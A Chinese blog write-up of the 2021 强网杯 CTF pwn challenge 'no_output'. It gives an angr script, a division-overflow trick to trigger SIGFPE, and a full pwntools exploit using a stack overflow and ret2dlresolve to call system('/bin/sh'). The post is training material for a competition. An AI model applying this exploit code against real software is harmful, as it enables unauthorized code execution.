强网杯 2021 no_output

最新推荐文章于 2024-01-20 17:01:34 发布
最新推荐文章于 2024-01-20 17:01:34 发布
阅读量3.1k 收藏 1
点赞数 1
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38204481/article/details/117953783
版权

强网杯 2021 no_output

没有输出,包含栈溢出。进行两次校验,前两次输入直接用angr模板获取。但是angr不能直接探索到触发信号之后(可能是咱不懂)

import angr
import sys
import binascii

def main(argv):
    path_to_binary = "./test"  # :string
    project = angr.Project(path_to_binary)#要分析的二进制文件

    # 告诉ange从哪里开始执行entry_state() 表示从main函数开始
    initial_state=project.factory.entry_state()

    #创建一个使用起始状态初始化的模拟管理器。它提供
    #一些有用的工具来搜索和执行二进制文件。
    simulation=project.factory.simgr(initial_state)

    #函数会一直运行直到运行到0x08048675这个地质处,或者探索了每条可能路径
    print_good_address = 0x08049297  # :integer (probably in hexadecimal)
    simulation.explore(find=print_good_address,avoied=0x80494EC)
    #找到的方案会存放到simulation.found列表里面(列表里面存放的是地址)
    if simulation.found:
        solution_state=simulation.found[0]
        #用这种方式输出内容
        result=solution_state.posix.dumps(sys.stdin.fileno())
        print(result)

        print()
    else:
        raise Exception("Could not find the solution")
if __name__=="__main__":
    main(sys.argv)

接下来需要用除法触发浮点异常,最大负数除-1可以触发。

这个数可以表示为。 0x80000000,-2147483648,-0x80000000

然后用ret2dlresolve劫持执行流,payload直接提供了生成ret2dlresolve的方式

rop = ROP("./test")
elf = ELF("./test")
dlresolve = Ret2dlresolvePayload(elf,symbol="system",args=["/bin/sh"])
rop.read(0,dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
raw_rop = rop.chain()
print(rop.dump())
print(hex(dlresolve.data_addr))
payload =b'A'*76+p32(0x80490C0)+p32(0x8049582)+p32(0)+p32(0x804de00)+p32(0x8049030)+p32(0x5a04)+p32(0)+p32(0x804de20)#+b"/bin/sh\x00"
s.sendline(payload)#read_plt        p,pebp,ret                bss        push jmp dl_runtimeresolve
raw_input(">")
payload= dlresolve.payload
print(payload)
s.sendline(payload)
s.interactive()

第一个payload如下,所有内容不需要改,只需要在该payload前面添加偏移,偏移为覆盖到返回地址的长度

0x0000:        0x80490c4 read(0, 0x804de00)   read_plt对应jump指令   不需要改
0x0004:        0x8049582 <adjust @0x10> pop edi; pop ebp; ret    平衡栈
0x0008:              0x0 arg0       参数1
0x000c:        0x804de00 arg1       参数2  bss段
0x0010:        0x8049030 [plt_init] system(0x804de20)      push  plt_base ; jmp dl_resolve  
0x0014:           0x5a04 [dlresolve index]      index  不需要改
0x0018:          b'gaaa' <return address>       返回地址
0x001c:        0x804de20 arg0                        
0x804de00

完整payload

from pwn import *
s = process("./test")
# s = remote("39.105.138.97","1234")
context.terminal =['/usr/bin/tmux', 'splitw', '-h', '-F#{pane_pid}' ]
# context.log_level="debug"
# gdb.attach(s,"b *0x80490C0\n")
s.send("\x00")
s.send('A'*0x20)
s.send("hello_boy\x00")
s.sendline("-2147483648")
s.sendline("-1")
rop = ROP("./test")
elf = ELF("./test")
dlresolve = Ret2dlresolvePayload(elf,symbol="system",args=["/bin/sh"])
rop.read(0,dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
raw_rop = rop.chain()
print(rop.dump())
print(hex(dlresolve.data_addr))
payload =b'A'*76+p32(0x80490C4)+p32(0x8049582)+p32(0)+p32(0x804de00)+p32(0x8049030)+p32(0x5a04)+p32(0)+p32(0x804de20)#+b"/bin/sh\x00"
s.sendline(payload)#read_plt        p,pebp,ret                bss        push jmp dl_runtimeresolve
raw_input(">")
payload= dlresolve.payload
print(payload)
s.sendline(payload)
s.interactive()

"""
0x0000:        0x80490c4 read(0, 0x804de00)   对应jump指令   实际用0x80490c0处的指令
0x0004:        0x8049582 <adjust @0x10> pop edi; pop ebp; ret    平衡栈
0x0008:              0x0 arg0       参数1
0x000c:        0x804de00 arg1       参数2  bss段
0x0010:        0x8049030 [plt_init] system(0x804de20)      push  plt_base ; jmp dl_resolve  
0x0014:           0x5a04 [dlresolve index]      index  不需要改
0x0018:          b'gaaa' <return address>       返回地址
0x001c:        0x804de20 arg0                        
0x804de00
"""
九层台
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021第五届强网杯部分writewp
zji
06-14 878
第五届强网杯部分题解 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录第五届强网杯部分题解前言一、Web1.1Web1 [强网先锋]寻宝操作过程二、MISC2.读入数据三、PWN 前言 提示:这里不是我一个人打出来的,一个团队,然后可能有些写得不是很清楚,望见谅。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Web 1.1Web1 [强网先
浅谈PHP中output_buffering
10-23
主要介绍了浅谈PHP中output_buffering的相关资料,需要的朋友可以参考下
MIMO.rar_multi output
09-24
Multi Input Multi Output
DRNN.rar_DRNN_output feedback
09-19
DRNN实例运用编程,而且对其输出层加了一个反馈。
Video_Output_c.rar_ADSP_Video_Output_c_bf561_mpeg4 dsp_output .m
09-21
基于adsp的mpeg4视频解码器的实现,c语言源程序
强网杯2023
最新发布
2202_75317918的博客
01-20 1031
当时看到这个题目 也是觉得易懂 并且可以解出来的但是数字实在是过大了兄弟题目意思是计算2^27的阶乘,并获取得到每一位数的数字之和,flag即为该数字的sha256编码2^27为134217728gmpy2包是支持大数运算的,故利用其fac方法进行尝试,在等待一段时间后可以得到对应的结果参考了其他师傅的wp得到运行结果为:4495662081然后利用一个在线工具进行sha256加密即可得到flag。
[强网杯2023] 只作了几个小题
weixin_52640415的博客
12-17 2087
格式化字符串 %nc%*d$d%k$n
[强网杯 2019]随便注
m0_56691564的博客
11-30 2545
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是注释都不行,因此这个题使用堆叠注入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
re 2021强网杯复现
m0_75098930的博客
11-19 180
其中,每一个加密中有一个额外的xor,还得恢复这个,分别异或的是0xfd,0x1fd,0x3fd,0x7fd。如果直接解密,很容易发现,用不了几轮,v3 的值就溢出了,这里很明显是两位输入用的int16来接受的。但是,最开始我以为是个很简单的对称加密,仔细看了看比较绕,实现了类似数列的一种吧。结合师傅的wp,发现这里是一个求积分的操作,没看出来,确实厉害。v3的初值是在运行中修改了的,静态的时候看着是0.2021。64位elf,看起来逻辑挺简单,接受38位的输入。最后,对tea加密分析的结果是。
强网杯-2022-GameMaster(.NET+C#+提取文件+z3爆破)
qq_54894802的博客
06-18 284
分析下面的代码,可以知道,这部分实现的代码,就是根据我们的按键,施行对应的操作,其中Enter键和space键,对应的函数下都有deal和stand,hit键,如果简单的玩过一下这个游戏,我们很容易知道,这几个函数实现的功能就是进行输赢的判断和检测自己的金钱还有多少,游戏是否继续。我们可以找到一个MZ的头,我们将其前面的数据删除,然后将其加入dll的后缀,因为此文件是以dll文件的形式载入我们的程序的。这里我们可以发现,是读取了我们的附件所给的gamemesage里面的数据,读取到filestream,
guoke_picture_input_output.rar_output 简约图片
07-15
输入图像,简单二值化图像,求取灰度图像,RGB图像,用不同算法作边缘检测,最后输出图像
miniLCTF 2023上的单回合pwn题目
weixin_52640415的博客
05-17 564
单次调用实现getshell
强网杯
zhang14916的博客
06-02 2986
1.Coppersmith 最初进入需要暴力破解sha256的哈希值,然后之后将会有6个挑战,下面将找出6个challenge的解 challenge1: 我们可以看出这里已知m的高位,需要求m的低位,我们可以使用lll格算法求解 e = 0x3 b = 0x9e67d3a220a3dcf6fc4742052621f543b8c78d5d9813e69272e65ac67667244...
强网杯2021——wp
m0_46296905的博客
11-30 4001
文章目录一、MISC(一)ISO1995(二)BlueTeaming(三)EzTime(四)Cipherman(五)threebody 一、MISC (一)ISO1995 题目描述:We follow ISO1995. ISO1995 has many problems though. One known problem is a time. 压缩包解压密码:fantasicqwb2021 光看文件头辨别不出什么文件,file命令看一下发现是Linux Debian的磁盘文件 binwalk提取出一个I
强网杯wp
Sentiment的博客
07-22 998
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 强网杯wp PWN PWN no_output 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import nu
2021强网杯全国网络安全挑战赛Writeup
道阻且长,行则将至。
06-20 7452
文章目录前言强网先锋-赌徒PHP的魔术方法题目POP链构造强网先锋-寻宝Key1之代码审计Key2之脚本搜索 前言 上周末端午假期期间(6月12日9:00至6月13日21:00)参与了为期 36h 的第五届强网杯网络安全竞赛,不得不说题目比去年难多了,两天下来腰酸背痛脑壳疼……比赛的数据大致如下: 幸运的是最终在实力傍队友的情况下,又一年获得竞赛前 10% 有效排名的 “强网先锋” 称号,在此记录下比赛的 Writeup。 强网先锋-赌徒 1、下发赛题,访问地址如下: 2、结合题目源码提醒,利用 dir
第六届“强网杯”全国网络安全挑战赛-青少年专项赛
热门推荐
Moxin1044的博客
09-06 1万+
试卷说明:本次考试共设置30道考题,单选题3分/道,多选题4分/道,满分100分。16、若两台主机在同一子网中,则两台主机的IP地址分别与它们的子网掩码相“与”的结果一定是?10、若两台主机在同一子网中,则两台主机的IP地址分别与它们的子网掩码相“与”的结果一定是?14、如果数据包是给本网广播的,那么该数据包的目的IP地址应该是()。13、如果数据包是给本网广播的,那么该数据包的目的IP地址应该是()。11、如果数据包是给本网广播的,那么该数据包的目的IP地址应该是()。
2022强网杯WP
CK_0ff的博客
08-08 2585
2022强网杯WP
ColumnTransformer object has no attribute set_output
05-24
`ColumnTransformer` object does not have an attribute named `set_output`. It could be possible that you are trying to use a method that does not exist in the `ColumnTransformer` class. You can refer to the documentation of `ColumnTransformer` to see the available methods and attributes. Alternatively, if you can provide more information on what you are trying to achieve, I can assist you further.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值